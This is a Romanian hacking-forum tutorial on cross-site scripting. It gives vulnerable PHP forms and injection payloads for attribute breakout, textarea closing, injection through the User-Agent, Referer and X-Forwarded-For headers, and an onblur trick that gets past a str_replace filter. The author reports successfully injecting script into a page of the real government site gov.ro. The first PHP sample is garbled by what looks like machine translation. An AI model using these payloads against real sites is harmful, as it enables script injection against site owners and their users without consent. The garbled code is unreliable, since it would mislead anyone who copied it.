Jump to content
io.kent

xss mai profund de alert..

By io.kent, in Tutoriale in romana

Recommended Posts

io.kent Newbie

io.kent

Posted
Posted (edited)

Nu ne limitam sa gasim xss ca de obicei cu tipicul script 

<script>alert("XSS")</script>

Una dintre cele mai comune vulneranbilitati in ziua de azi foarte periculoasa ca toate este ca daca sti sa te folosesti de ele, poti face orice vrei..

Cazu 1

orice vulnerabilitate este limitata atata cat vrei tu..

incepand cu Cookies pana la un deface,

doar iti trebuie 2 lucrurii esentiale,

1) mentalitate

2) imaginatie

dupa aia limita e cerul..

unu din cazurile cele mai comune

codul vulnerabil :

<html> 
<head> 
<title> Formular de cautare </ title> 
</ head> 
<body> 
<center> 
<? 
if (isset ($ _POST [Text])) { 
$ XSS = $ _POST [text]; dor "name = \" XSS \ "metoda = \" POST \ "> <form <h1> 0 rezultate </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "$ XSS \ "name = \" text \ "> <br> <input type=\"submit\" value=\"Cautare\"> </ form> ";
 } else { 
echo "<forma nume = \ "XSS \" metoda = \ "POST \"> <h1> Formular de c?utare </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "\" name = \ " textul \ "> <br> <input type=\"submit\" value=\"Cautare\"> </form>"; 
}
 ?>
 </ center> 
</ body> 
</ html>

Cum vedem in source daca cautam ceva, orice cautam ramane in from

asta e usor scriem 

“>Becali– "><script>alert("XSS")</script>

ceea ce e logic ca ar ramane asa 

<input type=”text” value=””>

Cazu 2 :

Limitarea in anumite caractere / Campuri de text limitate

un alt caz foarte comun va las aici minunea 

http://www.gov.ro/

Nu se putea adauga nimic in from ceva de genu : 

“>$#-|/()=\*¿?[/CODE

nici un caracter special, cautand simplu cuvant (buna)  rezultatul a fost acesta 

[CODE]resultatgeneral.jsp?cuvantul=buna&servici=0

asa ca am facut in felul urmator, 

http://url/resultatgeneral.jsp?cuvant=”><script>alert(/OK/)</script>&servici=0[b]

Bingo 

  [/b]

asta se poate face cu TAMPER DATA (ADDON De Firefox).

modificarea continutului ce se trimite prin post

cazu 3 Textarea

<textarea style="width:320px; height:120px" name=message></textarea>

cum se poate vedea cu un simplu "> nu merge bypass daca introducem un text va arata asa

<textarea style="width:320px; height:120px" name=message>Mensaje
</textarea>

:)

</textarea><script>alert(/PWNED/)</script>

ar ramane asa : 

<textarea style="width:320px; height:120px" name=message>
</textarea>
<script>alert(/PWNED/)</script>
</textarea>

Headers

Astai foarte interesanta ne jucam cu Headers sa scoatem un xss

1 – User Agent

Source:

<?php

$nav = $_SERVER['HTTP_USER_AGENT'];

echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>";

?>

Header:

Host: localhost

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

si daca al modificam: Host: localhost

User-Agent: numi aduc aminte de nume :$

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive


Y … User-Agent: <script>alert(/Yeah/)</script>

2 – Referer

Header:

host : Ce IP am? Care este IP-ul meu?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: 

http://www.google.com.do/

Cookie: ******

si daca al modificam :

host : Ce IP am? Care este IP-ul meu?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: <script>alert(/Yeah/)</script>

Cookie: ******

3 - X-Forwarded-For

host : Ce IP am? Care este IP-ul meu?

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: 

http://www.google.com/

X-Forwarded-For: 127.0.0.1

Cookie: ******

fiind 127.0.0.1 IP A Spoofear.

asta ne da ca output la IP in cazul acesta ar fii 127.0.0.1

host : Host: *********

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: 

http://google.com

X-Forwarded-For: <script>alert(/Yeah/)</script>

Cookie: ******

e la fel ca un xss

STR_Replace

ce sa faceti daca gasitii un script pentru xss

<?php

if(isset($_GET[xss])){

$xss = $_GET['xss'];

$xss2 = str_replace("<script>", "", $xss);
$xss3 = str_replace("alert", "", $xss2);
echo "<form name=\"Hi\">
<input type=\"text\" value=\"$xss3\" size=\"30\">
</form>";

}

?>

daca intentam sa punem 

<script>alert(Yeah)</script> ..

ar ramane asa 

alert(Yeah)</script>

si pentru asta nu se produce alert

dar incercam sa ajungem mai incolo cum vedem in source si cautam ( aaaa) astai rezultatul 

<input type="text" value="aaa" size="30">

parea ceva simplu de 

“><script>alert(WTF)</script>

dar nu putem folosi script :)

asa ca doar ne ramane sa ne gandim scriptul este complet vulnerabil codurile se imprima asa cum ajung doar excuind <script>

aici o sa folosim javascript 

http://www.w3schools.com/js/js_events.asp).

folosim : onblur

introducem : Onblur=alert(000) nu se produce alerta ramane inauntru in from

si pentru asta daca introducem

bufnita ar fi asa 

<input type="text" value="" bufnita size=”30”>

asa ca valoarea de from, ar fi nula

“ Onblur=alert(666) “

<input type="text" value="" “ Onblur=alert(666) “ size=”30”>

in acest caz am adauga o proprietate de avent in input provocand un xss !!

Bafta...

Edited by io.kent
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...